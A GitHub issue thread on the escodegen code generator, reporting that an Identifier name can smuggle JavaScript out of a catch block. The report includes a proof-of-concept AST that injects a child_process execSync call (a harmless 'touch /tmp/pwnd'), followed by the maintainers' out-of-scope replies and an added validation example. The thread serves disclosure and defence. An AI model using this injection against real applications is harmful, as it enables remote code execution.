estools / escodegen

ECMAScript code generator
BSD 2-Clause "Simplified" License

Security issue with statement expression parser for identifiers #453

Closed Zombiehelp54 closed 1 year ago

Zombiehelp54 commented 1 year ago

This issue was found during the Black Hat Middle East CTF; the bug lies in the expression parser for statement expressions of type "Identifier".

Here is an example ECMAScript AST object that will break out of a "CatchClause" statement:


{
    "type": "Program",
    "body": [
      {
        "type": "TryStatement",
        "block": {
          "type": "BlockStatement",
          "body": [
            {
              "type": "VariableDeclaration",
              "declarations": [
                {
                  "type": "VariableDeclarator",
                  "id": {
                    "type": "Identifier",
                    "name": "a"
                  },
                  "init": {
                    "type": "Literal",
                    "value": "test",
                    "raw": "'test'"
                  }
                }
              ],
              "kind": "var"
            }
          ]
        },
        "handler": {
          "type": "CatchClause",
          "param": {
            "type": "Identifier",
            "name": "e"
          },
          "body": {
            "type": "BlockStatement",
            "body": [
              {
                "type": "ExpressionStatement",
                "expression": {
                  "type": "Identifier",
                  "name": "a} this.process.mainModule.require('child_process').execSync('touch /tmp/pwnd'); function x(){"
                }
              }
            ]
          }
        },
        "finalizer": null
      }
    ],
    "sourceType": "script"
  }

Output:

> escodegen.generate(ast);

'try {\n' +
  "    var a = 'test';\n" +
  '} catch (e) {\n' +
  "    a} this.process.mainModule.require('child_process').execSync('touch /tmp/pwnd'); function x(){;\n" +
  '}'

Expected output should return a parsing error. If an application is vulnerable to prototype pollution, this bug can lead to RCE.

Constellation commented 1 year ago

Expected output should return a parsing error.

escodegen does not assume an invalid AST. It does not check whether the input is right or wrong. So, out of scope.

michaelficarra commented 1 year ago

Agreed with @Constellation. Additionally, there is no risk to escodegen users here since the generated program is not evaluated in any way.
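The caller-side check that the maintainers' replies leave to the application, as an added example that is not escodegen's own code: it walks an ESTree AST and rejects any Identifier whose name is not a syntactically valid ECMAScript IdentifierName before the tree reaches escodegen.generate(). The sample AST is constructed to match the shape of the report, with a harmless placeholder in place of the original payload string.

```javascript
// Added example, not escodegen's own code: reject any Identifier node whose
// "name" is not a valid ECMAScript IdentifierName before calling
// escodegen.generate(), which does no such validation itself.
// IdentifierName: IdentifierStart then IdentifierPart* (ZWNJ/ZWJ allowed in parts).
const IDENTIFIER_NAME = /^[$_\p{ID_Start}][$\u200C\u200D\p{ID_Continue}]*$/u;

function isValidIdentifierName(name) {
  return typeof name === 'string' && IDENTIFIER_NAME.test(name);
}

// Walk the tree (ESTree nodes are plain objects with a "type" field) and
// collect every Identifier whose name fails the check, with its path.
function findInvalidIdentifiers(node, path = 'root', out = []) {
  if (Array.isArray(node)) {
    node.forEach((c, i) => findInvalidIdentifiers(c, `${path}[${i}]`, out));
  } else if (node && typeof node === 'object') {
    if (node.type === 'Identifier' && !isValidIdentifierName(node.name)) {
      out.push({ path, name: node.name });
    }
    for (const [key, value] of Object.entries(node)) {
      // loc/range carry positions only, never child nodes
      if (key !== 'loc' && key !== 'range') findInvalidIdentifiers(value, `${path}.${key}`, out);
    }
  }
  return out;
}

// Gate to place in front of escodegen.generate(): throws on an unsafe name.
function assertSafeAst(ast) {
  const bad = findInvalidIdentifiers(ast);
  if (bad.length > 0) {
    throw new Error(`invalid Identifier name at ${bad[0].path}: ${JSON.stringify(bad[0].name)}`);
  }
  return ast;
}

// Constructed sample shaped like the report, with a harmless placeholder
// in place of the original payload string.
const SAMPLE_AST = {
  type: 'Program', sourceType: 'script',
  body: [{
    type: 'TryStatement', finalizer: null,
    block: { type: 'BlockStatement', body: [] },
    handler: {
      type: 'CatchClause', param: { type: 'Identifier', name: 'e' },
      body: { type: 'BlockStatement', body: [{ type: 'ExpressionStatement',
        expression: { type: 'Identifier', name: 'a} evil(); function x(){' } }] },
    },
  }],
};
```

Running `assertSafeAst(SAMPLE_AST)` throws, naming the path of the offending node, whereas `assertSafeAst(validAst)` returns the tree unchanged for use with `escodegen.generate`.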